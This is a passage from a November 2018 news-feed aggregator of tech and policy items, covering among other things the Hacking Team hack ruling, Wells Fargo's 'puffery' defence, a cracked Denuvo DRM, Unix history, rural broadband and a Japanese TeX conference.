Meanwhile, the court documents reveal that Vincenzetti has pursued vendettas against former employees whom he falsely believed to be implicated in the hack, going so far as to frame them with false evidence. However, Vincenzetti was ultimately unsuccessful in his attempts to frame these workers.

According to the court documents, Pelliccione not only had nothing to do with the hack, but Hacking Team actively tried to frame him—and got caught. Vincenzetti told investigators that the company detected two attempts to attack Hacking Team coming from IP addresses in Malta, where Reaqta used to be based. In fact, the judge concluded, it was the other way around: someone inside Hacking Team connected to Reaqta’s network the day after the attack, in a clear—albeit clumsy—attempt to leave breadcrumbs pointing to Pelliccione. (The other alleged attack was months before the hack on the company, on May 13, 2015, when Hacking Team had already engaged private investigators to figure out whether Pelliccione and another former employee had stolen company secrets.)

The judge found that Pelliccione and fellow former employees Guido Landi, Mustapha Maanna, Serge Woon, and Alex Velasco are innocent. But also found that Phineas Fisher’s motives were “certainly political and ideological.”

When I asked the hacker what they thought about the ruling, they said that they always wanted to expose what they believe were the company’s shady dealings.

“Maybe now the prosecutors will have time to investigate the various crimes committed by Hacking Team,” Phineas Fisher told me recently, referring to the sale of Hacking Team spyware in Sudan, the company's questionable hacking methods, and the sale to Mexican authorities who then used it to target dissidents. “But I don't have any illusions that prosecutors will look into any of that.”

Hacking Team Hacker Phineas Fisher Has Gotten Away With It [Lorenzo Franceschi-Bicchierai/Motherboard]

Wells Fargo: We can't be sued for lying to shareholders because it was obvious we were lying [Cory Doctorow – Boing Boing]

Wells Fargo has asked a court to block a shareholder lawsuit that seeks to punish the company for lying when it promised to promptly and completely disclose any new scandals; Wells Fargo claims that the promise was obvious "puffery," a legal concept the FTC has allowed to develop in which companies can be excused for making false claims if it should be obvious that they are lying (as when a company promises that they make "the best-tasting juice in America").

The lawsuit stems from Wells Fargo's crooked car-loan program that used deceptive tactics to defraud 800,000 customers, ultimately stealing 25,000 of their cars through fraudulent repossessions.

The shareholders argue that Wells Fargo CEO Tim Sloan misled investors in 2016, when he said that he was "not aware" of lurking sales scandals (this was four years after the company's internal investigations revealed the car ripoffs and a year before they were made public after a leak to the New York Times).

The company argues that Sloan was making "generic statements...on which no reasonable investor could rely" and thus the shareholders should not be able to sue for the losses they suffered when the scandal became public.

In other words, as the LA Times's Michael Hiltzik puts it, "We can’t be sued because no one believed us anyway."

The shareholder lawsuit focuses on the efforts by Sloan and his fellow executives to conceal the auto-loan scandal from the public. While they were trying to clean up the splatter from the bank’s most prominent scandal, in which sales representatives secretly opened millions of accounts for consumers in order to meet punishing work quotas, the executives consistently stated that they were investigating high and low to make sure the bank was otherwise clean and would fully disclose anything they discovered.

“We want to leave no stone unturned,” Sloan told investment analysts during a conference call in January 2017. “If we find something that’s important, we’ll communicate that…. I think given our desire to be very transparent, we’ll probably err on the side of overcommunicating as opposed to undercommunicating.”

Yet by then, Sloan had received a report from the consulting firm Oliver Wyman that laid out the auto-loan scandal in great detail.

The scandal stayed out of the public eye until the Oliver Wyman report was leaked to the New York Times, which published a story about it July 27, 2017; Wells Fargo issued a news release fessing up to the matter that very day.

Wells Fargo says its promises to restore consumer trust were just ‘puffery.’ But they look more like lies [Michael Hiltzik/LA Times]

(via Naked Capitalism)

14:35

Link [Scripting News]

A request for news media. If the president makes a proclamation re something he has no power over, that's the story, if you want to report anything. If you carry his proclamation as if he had the power, you're colluding. His excuse is he's corrupt. What's your excuse?

14:14

Global antiquarian bookseller strike brings Amazon to its knees [Cory Doctorow – Boing Boing]

When Amazon division Abebooks -- the largest platform for antiquarian booksellers in the world -- announced it would blacklist stores in the Czech Republic, Poland, Hungary, South Korea and Russia, citing nebulous transaction-processing difficulties -- 600 antiquarian booksellers in 27 countries went on strike, withdrawing their 4,000,000 titles from Abebooks.

Two days later, Amazon reversed its policy and promised that booksellers in the affected countries would continue to be welcome on its platform.

Despite the victory, the lesson that some booksellers have taken away from the event is that Amazon does not have their interests at heart and that their efforts should be focused on selling off of Amazon's platform.

“AbeBooks was saying entire countries were expendable to its plans,” said Scott Brown, a Eureka, Calif., bookseller who was an organizer of the strike. “Booksellers everywhere felt they might be next.”

The matter was apparently resolved when Sally Burdon, an Australian bookseller who is president of the International League of Antiquarian Booksellers, spoke with Arkady Vitrouk, chief executive of AbeBooks. In a Wednesday email to her members after their talk, Ms. Burdon said Mr. Vitrouk apologized for the platform’s behavior “a number of times” and said booksellers in the affected countries would not be dropped as scheduled on Nov. 30.

“Arkady told us that ABE are very well aware of the mistake they have made,” she wrote in the email, which was viewed by The New York Times. “He stated that it was a ‘bad decision’ and that they deeply regret the hurt and harm they have caused.”

After Protest, Booksellers Are Victorious Against Amazon Subsidiary [David Streitfeld/New York Times]

(Image: Kheel Center, CC-BY)

(via Naked Capitalism)

New, "unbreakable" Denuvo DRM cracked two days before its first commercial deployment [Cory Doctorow – Boing Boing]

Denuvo bills itself as the best-of-breed in games DRM, the most uncrackable, tamper-proof wrapper for games companies; but its reputation tells a different story: the company's products are infamous for falling quickly to DRM crackers and for interfering with game-play until you crack the DRM off the products you buy.

The company's reputation for unjustifiable bragging is well-deserved: the latest iteration of Denuvo DRM is version 5.3, slated to launch with Hitman 2 on November 13th. But Hitman 2 leaked onto the internet yesterday, two days prior to its launch, and Denuvo 5.3 was cracked within hours -- two days before the official release.

The DRM was cracked by a group calling itself FCKDRM.

While several groups have been chipping away at Denuvo for some time, FCKDRM is a new entrant (at least by branding) to the cracking scene. Notably, FCKDRM isn’t a ‘Scene’ group but one that works in P2P circles. At least for now, their identities remain a secret but their choice of name is interesting.

FCKDRM is the official name for the anti-DRM initiative recently launched by GOG, a digital distribution platform for DRM-free video games and video.

There’s no suggestion at all that GOG is involved in the cracking of Denuvo, of course, but the FCKDRM group are using GOG’s FCKDRM logo when announcing releases, which certainly has the potential to confuse casual pirates.

Hitman 2’s Denuvo Protection Cracked Three Days Before Launch [Andy/Torrentfreak]

13:49

Four short links: 12 November 2018 [All - O'Reilly Media]

Gov Open Source, Bruce Sterling, Robot Science, and Illustrated TLS 1.3

  1. FDA MyStudies App -- open source from government, designed to facilitate the input of real-world data directly by patients which can be linked to electronic health data supporting traditional clinical trials, pragmatic trials, observational studies, and registries.
  2. Bruce Sterling Interview -- on architecture, design, science fiction, futurism, and involuntary parks. (via Cory Doctorow)
  3. Inventing New Materials with AI (MIT TR) -- using machine learning to generate hypotheses for new materials, to be explored and tested by actual humans.
  4. The New Illustrated TLS Connection -- Every byte explained and reproduced. A revised edition in which we dissect the new manner of secure and authenticated data exchange, the TLS 1.3 cryptographic protocol.


Four short links: 9 November 2018 [All - O'Reilly Media]

Counting Computers, New Software, Unix History, and Tencent Framework

  1. How Many Computers Are In Your Computer? -- So, a desktop or smartphone can reasonably be expected to have anywhere from 15 to several thousand computers in the sense of a Turing-complete device which can be programmed and which is computationally powerful enough to run many programs from throughout computing history and which can be exploited by an adversary for surveillance, exfiltration, or attacks against the rest of the system. Which is why security folks sometimes sleep poorly at night.
  2. Some Notes on Running New Software in Production (Julia Evans) -- The playbook for understanding the software you run in production is pretty simple. Here it is: (1) Start using it in production in a non-critical capacity (by sending a small percentage of traffic to it, on a less critical service, etc); (2) Let that bake for a few weeks. (3) Run into problems. (4) Fix the problems. Go to step 3.
  3. Unix History (Rob Pike) -- know your past.
  4. Omi -- Tencent's next generation web framework in 4KB JavaScript (Web Components + JSX + Proxy + Store + Path Updating).


13:28

An illustrated tour of Unix history [Cory Doctorow – Boing Boing]

Unix pioneer Rob Pike was there from the start, physically transporting key elements of the "Toronto distribution" of Unix to Berkeley when he started grad school, and then to Bell Labs, working alongside Dennis Ritchie and other key Unix programmers to develop and refine everything from modern editors to compilers to windowing systems.

His hour-long "illustrated memoir" of the deep history of Unix is delightful, touching on the people and institutional forces that shaped the operating environment that has come to dominate modern computing (he even gives a mention to Cardiac, the cardboard computer that shaped my own computing life).

And beyond being fascinating, this is also very funny: those early pioneers were very playful and prone to pranking each other in ways that remain very relatable, even all these years later. Pike is a very good presenter, and his Zelig-like presence at so many key moments in our shared digital history makes this a tale worth telling, and watching.

(via Four Short Links)

How many computers are in your computer? [Cory Doctorow – Boing Boing]

Gwern Branwen asks the deceptively simple question "How many computers are in your computer?"

Having defined "computer" as "a Turing-complete device which can be programmed in a usefully general fashion with little or no code running on the 'official' computer," Branwen enumerates the crazily large number of systems in your phone, laptop or server that qualify -- which may seem like a mere exercise.

But that's where the other half of Branwen's definition comes in: a computer "is computationally powerful enough to run many programs from throughout computing history and which can be exploited by an adversary for surveillance, exfiltration, or attacks against the rest of the system."

In other words, every one of these computers is a potential weak point in your "computer"'s security.

For a lot of people, BadUSB was a wake-up call on this, and then Bloomberg's controversial story about tiny backdoor chips in server hardware came as an important reminder about all the ways that a computer can be compromised.

But Branwen's list goes so far beyond these components as to be dizzying and somewhat demoralizing. Attacks on any of these "Turing-complete device[s] which can be programmed in a usefully general fashion" represent a huge blind spot in contemporary computer security.

You might think you have just the one large CPU occupying pride of place on your motherboard, and perhaps the GPU too, but the computational power available goes far beyond just the CPU/GPU, for a variety of reasons: transistors and processor cores are so cheap now that it often makes sense to use a separate core for realtime or higher performance, for security guarantees, to avoid having to burden the main OS with a task, for compatibility with an older architecture or existing software package, because a DSP or core can be programmed faster than a more specialized ASIC can be created, or because it was the quickest possible solution to slap down a small CPU and they couldn’t be bothered to shave some pennies. Further, many of these components can be used as computational elements even if they were not intended to be or hide that functionality. (For example, I believe I’ve read that the Commodore 64’s floppy drive’s CPU was used as a source of spare compute power & defeating copy-protection schemes.)

How many computers are in your computer? [Gwern Branwen]

(via Four Short Links)

The market failed rural kids: poor rural broadband has created a "homework gap" [Cory Doctorow – Boing Boing]

America's commitment to market-based broadband -- fueled by telcom millions pumped into campaigns against public broadband provision -- has left rural Americans without access to the broadband they need to fully participate in twenty-first century life, with students among the hardest-hit victims of broadband deprivation.

The FCC can fix this. Across the country, "whitespace" spectrum (used to buffer licensed broadcasters from overlapping signals in adjacent territories) was historically allocated for rural educational TV broadcasts. When these didn't materialize, the spectrum was reclassified for wireless internet and the FCC started parceling it off to telcos, taking it away from the schools that could use it to connect their kids to the internet.

Many of these schools are on publicly operated, state-funded fiber loops, and could erect their own towers that students could use to connect to the internet over high-speed fixed wireless links, but only if the FCC gives the educational sector access to that educationally earmarked spectrum.

A recent FCC proceeding was flooded both by comments from educator technologists describing the educational costs of the homework gap and promising to remediate this gap by rolling out fixed wireless; and comments from telcoms lobbyists, representing the companies that have so significantly failed rural America, promising that if they get the school spectrum allocated to them, they'll do better this time.

With Trump's FCC in the hands of dingo babysitters like Ajit Pai, who want to end all public provision of network service and hand everything over to big telco, things look grim for rural American kids.

In the meantime, some teachers at Panguitch High School are moving more of their classroom work online. “Given the expectations we now have for student access, it’s difficult for those students who don’t have good internet at home,” said the school’s principal, Russell Torgersen. He’s seen the students sitting in the school parking lot to tap the Wi-Fi on weekends, and he’s had many conversations with teachers about how to work around students’ spotty home connections.

For now, it’s a waiting game, as the FCC plods toward a decision on the fate of the EBS spectrum. Given the uncertainty, Eyre and his allies are looking at alternative paths to spectrum licenses, such as the lengthy and complex FCC waiver process successfully used to create a rural educational broadband network in Michigan’s Upper Peninsula.

Even if the FCC ultimately decides to give new EBS spectrum licenses to rural school districts like Garfield County, it’s hard to say how much of the homework gap could then be eliminated. Current estimates of rural broadband don't take into account the boundaries of EBS whitespace, nor the fact that a home broadband connection can be inadequate for a school network's needs, according to digital-inclusion advocates such as Susan Bearden, chief innovation officer for the Consortium for School Networking (CoSN), a professional association for school technology leaders.

Rural Kids Face an Internet 'Homework Gap.' The FCC Could Help [Chris Berdik/Wired]

12:49

Chris Lamb: Review: The "Trojan Room" coffee [Planet Debian]

I was recently invited to give a seminar at Cambridge University's Department of Computer Science and Technology on the topic of Reproducible Builds.

Whilst it was an honour to have been asked, it also afforded an opportunity to drink coffee from the so-called "Trojan Room" which previously housed the fabled Computer Laboratory coffee pot:

For those unaware of the background, to save hackers in the building from finding the coffee machine empty, a camera was set up on the local network in 1991 using an Acorn Archimedes to capture a live 128×128 image of the pot, thus becoming the world's first webcam.

According to Quentin Stafford-Fraser, the technical limitations at the time did not matter:

The image was only updated about three times a minute, but that was fine because the pot filled rather slowly, and it was only greyscale, which was also fine, because so was the coffee.

Whilst the original pot was sold for £3,350 in 2001 what, you may ask, did I think of the coffee I sampled? Did the historical weight of the room imbue a certain impalpable quality into the beverage itself? Perhaps this modern hacker lore inspired deep intellectual thoughts in myself? Did it infuse a superlative and indefinable depth of flavour that belied the coffee's quotidian origins…?

No, it did not.

(Thanks to Allison Randal for arranging this opportunity.)

12:42

Britons! Tell the UK government that the compulsory porn-viewing logs need compulsory privacy standards [Cory Doctorow – Boing Boing]

The British government has decreed that adult sites must collect age-verification data on everyone who looks at material rated for 18-and-over viewing; this amounts to a database of the porn-viewing habits of every adult in the UK.

While this logging is compulsory, compliance with privacy protections is optional.

The Open Rights Group has a form where you can contact the government and demand that they make privacy protection mandatory and integral, not optional and an afterthought.

* We are grateful to the BBFC and the DCMS for recognising that Age Verification technology needs strong privacy protection.

* The BBFC’s voluntary privacy scheme is an improvement, but companies can simply ignore the guidance.

* Protecting the public’s digital privacy should not be optional. Strong privacy protections for Age Verification technology must be made compulsory.

* The implementation of Age Verification technology must be delayed until privacy protections are mandatory.

* Major data breaches make headlines on a regular basis. Strong privacy protection must be a priority, not an afterthought.

Making Age Verification privacy rules matter [Open Rights Group]

12:35

Hiding Secret Messages in Fingerprints [Schneier on Security]

This is a fun steganographic application: hiding a message in a fingerprint image.

Can't see any real use for it, but that's okay.

12:07

CodeSOD: To Round a Corner [The Daily WTF]

Last week we saw an attempt to reinvent the ceil function. Tina raised a protest: "6 lines to re-implement a ceil function? We can do better." //Rounds to 1000d Superior public int...

10:21

Feeds | Open Community Metrics and Privacy: MozFest18 Recap [Planet GridPP]

Open Community Metrics and Privacy: MozFest18 Recap s.aragon 12 November 2018 - 9:19am

By Raniere Silva, Software Sustainability Institute, and Georg Link, University of Nebraska at Omaha. Open communities lack a shared language to talk about metrics and share best practices. Metrics are aggregate information that summarise raw data into a single number, stripping away the context of the data. Pedagogical metric displays are an idea for metrics that include an explanation and educate the user on how to interpret the metric. Metrics are inherently biased and can lead to discrimination. Many problems brought up during the MozFest session are being worked on in the CHAOSS project.

09:42

The magnetic generosity of the network effect [Seth's Blog]

If you share a pizza with a large crowd, no one will be very satisfied.

But if you share an idea with a group, it creates cultural impact and becomes more valuable as it spreads, not less.

Most of the time, we adopt the scarcity model of pizza. “I don’t have that much, and if I share it with you, I won’t have any left…”

But in fact, the useful parts of our life are better characterized as, “If I share it with you, we’ll both have it.”

An idea shared is more powerful than one that’s hidden. A technology standard outperforms a proprietary one. A community is stronger than divided individuals ever could be.

When you give away your work by building the network, you’re not giving it away at all.

You’re building trust, authority and a positive cycle of better.

08:56

Hitman 2’s Denuvo Protection Cracked Three Days Before Launch [TorrentFreak]

Protecting video games from piracy has become big business over the years. The latest games consoles from Sony and Microsoft appear relatively secure but the same cannot be said about PC titles.

Due to the fact that PC games are loaded onto a platform that is instantly accessible to hackers, it’s almost inevitable that any games worth having will have their piracy protections removed at some point and leak online for all to download.

The company on the anti-piracy frontlines is Denuvo. Its anti-tamper technology is fiendishly difficult to crack and as such it regularly finds its way on to many of the gaming world’s most cherished titles. However, Denuvo is not infallible so regularly finds itself targeted by crackers.

This weekend, the technology suffered yet another disappointing blow. The long-awaited stealth game Hitman 2 – which comes ‘protected’ by the latest variant of Denuvo (v5.3) – leaked online. Aside from having its protection circumvented, this happened three days before the title’s official launch on November 13.

It appears that a relatively new cracking group called FCKDRM (more on them in a moment) obtained a version of Hitman 2 that was only available to those who pre-ordered the game. There are some reports of the crack failing at times on some machines but nevertheless, this leak is important on a number of fronts.

Firstly, the game leaked online three days early, rendering the protection when the game finally comes out much less useful. Secondly, presuming the original copy of the game was obtained on Friday when the pre-order copy was delivered, it took just a single day for the group to crack Denuvo’s latest protection.

Considering an announcement made by Denuvo just last week, this is a pretty embarrassing turn of events. Denuvo’s aim is to protect games in their initial release window and according to the company, having no protection can result in millions of dollars in potential lost revenue in just a couple of weeks.

To be on the safe side, however, the company also highlighted the importance of protecting games for just four days (notably a couple of Denuvo-protected titles recently withstood attack for the same period). Winding back further still, the company said that even providing protection for an hour is worthwhile. Clearly, minus three days didn’t figure into Denuvo’s plans.

While several groups have been chipping away at Denuvo for some time, FCKDRM is a new entrant (at least by branding) to the cracking scene. Notably, FCKDRM isn’t a ‘Scene’ group but one that works in P2P circles. At least for now, their identities remain a secret but their choice of name is interesting.

FCKDRM is the official name for the anti-DRM initiative recently launched by GOG, a digital distribution platform for DRM-free video games and video.

There’s no suggestion at all that GOG is involved in the cracking of Denuvo, of course, but the FCKDRM group are using GOG’s FCKDRM logo when announcing releases, which certainly has the potential to confuse casual pirates.

Given that Denuvo 5.3 was cracked so quickly (some crashing issues aside) it raises questions about other upcoming titles set to use similar technology. They include Battlefield V from EA/DICE, which has its official full release on November 20 but is already available to early access players.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Top 10 Most Pirated Movies of The Week on BitTorrent – 11/12/18 [TorrentFreak]

This week we have three newcomers in our chart.

Mission: Impossible – Fallout is the most downloaded movie.

The data for our weekly download chart is estimated by TorrentFreak, and is for informational and educational reference only. All the movies in the list are Web-DL/Webrip/HDRip/BDrip/DVDrip unless stated otherwise.

RSS feed for the articles of the recent weekly movie download charts.

This week’s most downloaded movies are:
Most downloaded movies via torrents
Movie rank | Rank last week | Movie name | IMDb rating / trailer
1 | (…) | Mission: Impossible – Fallout | 8.0 / trailer
2 | (1) | The Equalizer 2 | 6.9 / trailer
3 | (2) | The Meg | 5.9 / trailer
4 | (3) | Incredibles 2 | 8.0 / trailer
5 | (5) | Mile 22 | 6.1 / trailer
6 | (…) | Outlaw king | 7.1 / trailer
7 | (6) | Alpha | 6.9 / trailer
8 | (4) | The Nun (subbed HDRip) | 5.7 / trailer
9 | (…) | Kin | 5.6 / trailer
10 | (9) | BlacKkKlansman | 7.7 / trailer


1243 [LFG Comics]

The post 1243 appeared first on Looking For Group.

1241 [LFG Comics]

The post 1241 appeared first on Looking For Group.

1240 [LFG Comics]

The post 1240 appeared first on Looking For Group.

1239 [LFG Comics]

The post 1239 appeared first on Looking For Group.

1238 [LFG Comics]

The post 1238 appeared first on Looking For Group.

08:35

Swapped, p1 [Ctrl+Alt+Del Comic]

Last day for the posters. Closing orders at midnight. If we have any extras (since I have to print them at a round number), they’ll go up at a later date, but they won’t be signed.

05:49

Girl Genius for Monday, November 12, 2018 [Girl Genius]

The Girl Genius comic for Monday, November 12, 2018 has been posted.

05:00

Indie Rock Bottom [Diesel Sweeties webcomic by rstevens]

this is a diesel sweeties comic strip

In tonight’s comic, Indie Rock Pete hits Indie Rock Bottom:

03:07

Link [Scripting News]

Ray Ozzie used ThinkTank to write the spec for Lotus Notes.

02:42

Norbert Preining: TeXConf 2018 – the meeting of the Japanese TeX Users [Planet Debian]

On Saturday I attended the yearly meeting of the Japanese TeX Users, TeXConf 2018, which this year took place in Sapporo, Hokkaido. Since there is loads of information in Japanese on this meeting, I give a short summary of the talks in English.

Having attended several international TeX conferences, I am always surprised how many Japanese TeX users find their way to this yearly meeting. This year we were about 50 participants. We had five full talks and two lightning talks, followed by a very enjoyable dinner and after-party.

The first talk was by Takuto ASAKURA (朝倉卓人) on llmk – The Light LaTeX Make (slides). Takuto gave a short overview on the available TeX make alternatives and why he saw the need for a new tool, which is written in texlua. After some short examples of usage he mentioned a few advanced usage scenarios. He will write an article for the TUGboat and plans to present llmk at the TUG conference 2019 in the US. As an old-school guy I prefer make, which is by far more powerful, but I welcome additions to make building TeX documents easier. My only wish would be a “no-markup-do-your-best” build system – guess I will start writing my own 😉

Next up was my own talk on Continuous Integration Testing for TeX Live (slides), where I go into the nitty-gritty details of DevOps for TeX Live – mirroring the Subversion repos into git, and linking them to CI services, as well as using deployments to get binaries back. I hope to have an article about this ready for the next TUGboat.

After lunch, Takashi SUWA (諏訪 敬之) presented his work on a new typesetting system with a static type system, SATySFi. With his background in formal verification, Takashi took an interesting approach to typesetting. Due to the complete static typing of the input source, error messages can be much more informative – one of Takashi’s biggest complaints with current TeX, but it also makes the input format a bit bothersome in my opinion. For me one of the biggest achievements of DEK is the definition of a no-frills, easy to read and write input format for mathematics. Takashi has also written a book documenting SATySFi, and I have urged him to make an English translation.

The next talk was by Keiichiro ISHINO (石野恵一郎) on Breaking Paragraphs into Lines with the AHFormatter, a commercial typesetting program targeting businesses with XSL-FO, CSS, XML, ... formatting abilities. It was very interesting to see how commercial products deal with the very same problems we are facing.

Hironori KITAGAWA (北川弘典) reported on the state of luatex-ja (slides), in particular his work on line adjustments in the presence of inline math formulas, as well as usage of the luatex-fontspec sub-package. I cannot repeat it often enough: I consider this package one of the most important, and it is in daily use on my side.

The day closed with two lightning talks. The first was by Keiichiro SHIKANO (鹿野桂一郎) on the usage of Encapsulated PostScript (eps) files in TeX (slides). Unfortunately, he didn’t really rehearse his talk and his time was over before it got interesting 😉 Fortunately we can read his slides online.

The last talk was by Hironobu YAMASHITA (山下弘展) on How to become happy when typesetting Japanese with LaTeX (slides). A very funny and informative talk on the incredible work Hironobu is doing for the TeX community – development of a large number of packages, support and updates of the source code of several programs, the list is long.

I love to attend TeX meetings, and the Japanese TeXConf is always especially interesting, in particular because TeXies here have a tendency to be rather tech savvy, one could even say \expandafter-maniac. This was in fact the biggest complaint during our walk to the dinner location, that there wasn’t enough mention of \expandafter in the talks.

I have now been attending the Japanese TeX User meetings for nearly ten years, and I think we have come a long way – from a rather separate group of TeX developers and users distributing their stuff on Japanese only wikis and private pages, to a group that is now very strongly integrated in our global TeX community (TUG conference in Tokyo) as well as contributing to many projects. Thanks a lot!

02:28

Pale Blue Dot [QC RSS]

I miss Carl Sagan

00:42

Kernel prepatch 4.20-rc2 [LWN.net]

The 4.20-rc2 kernel prepatch is out for testing. "Fairly normal week, aside from me traveling".

Sunday, 11 November

22:49

Pro-Copyright Bias is Alive, Well, and Still Hiding the Full Story [TorrentFreak]

In 2007, the movie The Man From Earth leaked on file-sharing networks, with unexpected results. Instead of proving nothing but damaging, the title gained almost universal praise, rocketing the sci-fi flick to stardom via word-of-mouth advertising.

Director Richard Schenkman and producer Eric Wilkinson embraced the development and enthused over the attention their work was receiving online. Given the positive experience, during January 2018 the team deliberately ‘leaked’ the sequel – The Man from Earth: Holocene – on The Pirate Bay.

Given that filmmakers tend to view piracy as the enemy, TorrentFreak enthusiastically reported both events. Sadly, we had less positive news to convey this week when, out of the blue, Schenkman published an article on the site of pro-industry, anti-piracy alliance CreativeFuture, in which he heavily criticized piracy.

There can be little doubt that the piece was a gift to CreativeFuture and everyone who viewed Schenkman and Wilkinson’s place in the piracy debate as something positive for unauthorized sharing. The movie’s story had become a ray of light and here it was being shredded, a disastrous episode from which nothing good had come.

At TorrentFreak, however, we had our doubts about the tone of the piece. Never before had we seen such a turnaround, particularly when reviewing all previous correspondence with Schenkman. Something didn’t add up.

Mainly due to timezone differences, Schenkman responded to our questions after our article was published. However, his responses only served to increase our suspicions that what had been published on CreativeFuture wasn’t representative of his overall position on piracy.

First of all, Schenkman was rightfully furious about his movie being distributed in Russia after being professionally dubbed, with his donation requests removed from the resulting copy. That, most people will agree, is a flat-out insult to someone who has bent over backward to accommodate piracy.

He had every right to be annoyed but it’s worth noting that his anger was directed at one site, not necessarily pirates in general. In fact, Schenkman told us that plenty of positives have come out of the releases of both movies.

“The only reason that people all over the world knew and loved the original ‘Man from Earth’ was because of piracy, so while I’m disappointed that we’ve (still) made so little money from the first film, I’m deeply grateful that so many people have been able to see my movie,” he told TF this week.

“I’m still quite enthusiastic about, and deeply grateful for, the thousands of people who have written to us with kind words about the films, and who have made donations, large or small,” he added.

“I well understand that once we released the movie into the pirate ecosystem, nobody was under any obligation whatsoever to send us one penny, so the fact that so many have made donations is stunning to me, and I’ll never cease to be appreciative and impressed by the number of people who embraced the honor system. And luckily, donations continue to come in every day.”

For those wondering whether Schenkman’s piece in CreativeFuture and his comments to us might’ve been penned by a different author, assumption forgiven. From our contacts with him in 2007 right through to the present day, we have found Schenkman to be an honest man and a pleasure to deal with. He has never said anything to suggest that piracy is an “existential threat” to creators as mentioned in his piece. So why the sudden negativity?

We all know that life events can shape perceptions, so when the movie’s website and donation portal were hacked around six weeks ago, things began to take a turn for the worse. No revenue for weeks (and thousands in costs to bring it back) appear to have negatively affected the experience for the director. Then other types of piracy happened, ones that ensured that donations would be reduced.

“I learned that there were other people who ignored our requests to share only the version we uploaded, and ripped the movie from BluRay, so that there are versions floating around without my donation preface, even though we DID upload a full HD (BD quality) version of the picture,” Schenkman told TorrentFreak.

Even given the above events, however, the piece in CreativeFuture appears unnecessarily one-sided for a man who still had confidence in the piracy ecosystem a few months ago. Indeed, Schenkman told us this week that his team planned hard for the ‘pirate’ release of Holocene.

“In the case of the new film, we worked for months to promote awareness, so that there would be a groundswell of interest from fans of the original film. I would say that this effort at least partially worked,” he explained.

“In the first week of the pirate release, many thousands of people a day downloaded it, so there was a clear pent-up demand. And we’ve seen more donations come from the ‘Holocene’ release than we ever did from [Man From Earth] alone. So yes, in that sense, the ‘authorized leak’ of the new film has definitely helped spread awareness.

“The movie would have been pirated regardless; by doing it ourselves, we were, to some degree, able to control the narrative, and indeed it became more of a ‘story’, just the same way that ‘producers thank pirates’ became a story at the time of the original film’s release,” he added.

In a long email exchange, Schenkman told us that plenty of fans who didn’t even particularly like his sequel contacted him to congratulate him on choosing the honor system, while donating $5 as a ‘thank you’.

“You’d be surprised at how many of those messages I’ve gotten,” he told us.

But while Schenkman might be surprised at this generosity, we certainly aren’t surprised that none of this came out in the CreativeFuture piece.

It’s understandable that CreativeFuture want to fight their corner with a flawless, polished, and invulnerable anti-piracy narrative, but thankfully we aren’t afraid of calling out both sides of this war, when it’s called for. People deserve that honesty.

For example, Schenkman wanted to speak about some of his frustrations with movie distribution in his article. He believes that the international distribution system is flawed because there isn’t an efficient and fair commercial way to make an indie movie available everywhere, on the same day, unless Netflix buys it.

Those sentiments didn’t make the CreativeFuture piece but we’re happy to let him have a voice here.

“Even now, there isn’t a fair, equitable way for an indie filmmaker like me to make their movie available everywhere around the world at once. Even Amazon, which is in virtually every country, doesn’t allow you to simply upload your movie and with the click of a button make it available everywhere,” he says.

“I think they’ll eventually get there, but not anytime soon. If Netflix buys your movie, great — but if they don’t, you’re back to the antiquated system of going to international film markets and trying to sell you film country by country, a costly, inefficient, and time-consuming process (and again, you’re totally at the mercy of the ‘gatekeepers’).

“When we first released ‘Holocene’ we also made it available at Vimeo and MovieSaints, two platforms which allow access to viewers from most countries. Moviesaints has a unique system allowing both for a partial refund if you don’t like the movie, as well as a ‘tip the filmmaker’ function if you want to provide more support,” he adds.

And then comes an even stronger hint as to why Schenkman’s important comments didn’t make his own article.

“While we’ve seen revenue from both of these platforms, it doesn’t approach the total we’ve earned from donations. So the good news is that thousands of people who watched ‘Holocene’ via the pirate ecosystem have kindly, generously made donations to help support independent film,” he says.

Of course, in the interests of fair reporting we’re absolutely unafraid of publishing the not-so-good news too, so here it is – warts and all.

“The bad news is that hundreds of thousands (or millions) more have not, and thus we are still a long way from breaking even on this very low-budget movie. I really don’t see a sustainable business model for a truly independent filmmaker creating these kinds of thoughtful, serious movies, although I remain open to ideas!” Schenkman concludes.

While CreativeFuture are absolutely entitled to publish whatever they see fit on their own site, it seems clear from Schenkman’s article (and his comments to us spanning more than a decade) that they are only interested in a tightly-controlled narrative that leaves room for criticism of piracy, but none to detail some of the self-inflicted reasons behind much of it.

Piracy is certainly controversial and it can be bad, we’ve acknowledged as much in this piece. But hiding important parts of the full story – especially when they highlight flaws in the distribution system that contributes to piracy’s existence – is just as corrosive.


19:42

MPAA: Switzerland Remains “Extremely Attractive” For Pirate Sites [TorrentFreak]

While the European Union has worked hard to strengthen its copyright laws in recent years, one country in the heart of the continent chooses its own path.

Switzerland is not part of the EU, which means that its policies deviate quite a bit from its neighbors. According to Hollywood, that’s not helping creators.

Responding to a recent submission to the United States Trade Representative (USTR), the MPAA has identified several foreign “trade barriers” around the world. In Hollywood’s case, many of these are related to piracy.

One of the countries that’s highlighted, in rather harsh terms, is Switzerland. According to the MPAA, the country’s copyright law is “wholly inadequate” which, among other things, makes it “extremely attractive” to host illegal sites.

“Switzerland’s copyright law is wholly inadequate, lacking crucial mechanisms needed for enforcement in the digital era,” MPAA writes.

“Switzerland lacks meaningful remedies and effective enforcement against online copyright infringement. Switzerland’s inadequate legal framework and robust technical infrastructure make it an extremely attractive host for illegal sites.”

One of the concerns is that the Swiss currently have no requirement for Internet services to remove infringing content. In addition, services can’t be held liable for infringements of customers.

The Hollywood group says this should change, adding that it also wants ISPs to aid their piracy battle, and to make sure that “copying” from unauthorized sources is outlawed. The MPAA proposes several changes the Swiss should implement, which include:

1) Ensuring liability under Swiss law for parties who facilitate, encourage, and profit from widespread infringement
2) Engaging ISPs in the fight against online piracy
3) Affirming that current law does not permit copying from unauthorized sources
4) Implementing adequate civil and criminal enforcement tools

While this sounds like a rather pressing matter, these recommendations and the associated problems are far from new. The MPAA’s submission does at times read like a broken record, using the exact same language as four years ago, as seen below.

From the MPAA’s 2014 report

These ‘copied’ sections appear throughout the report, also affecting other countries. For example, Hollywood still wants tougher penalties for Australian camcording pirates, using the same text as in 2014.

This suggests that, in some cases, no progress has been made at all. In Switzerland, however, that’s not the case.

With a new copyright law proposed last year, the Swiss aim to address the critique.

For example, the country addresses the hosting problem by introducing a “take-down-and-stay-down” policy. Internet services will be required to remove infringing content from their platforms and prevent that same content from reappearing. Failure to comply will result in prosecution.

In addition, the controversial Logistep ruling, which prevents companies from harvesting the IP addresses of file-sharers, will also be addressed.

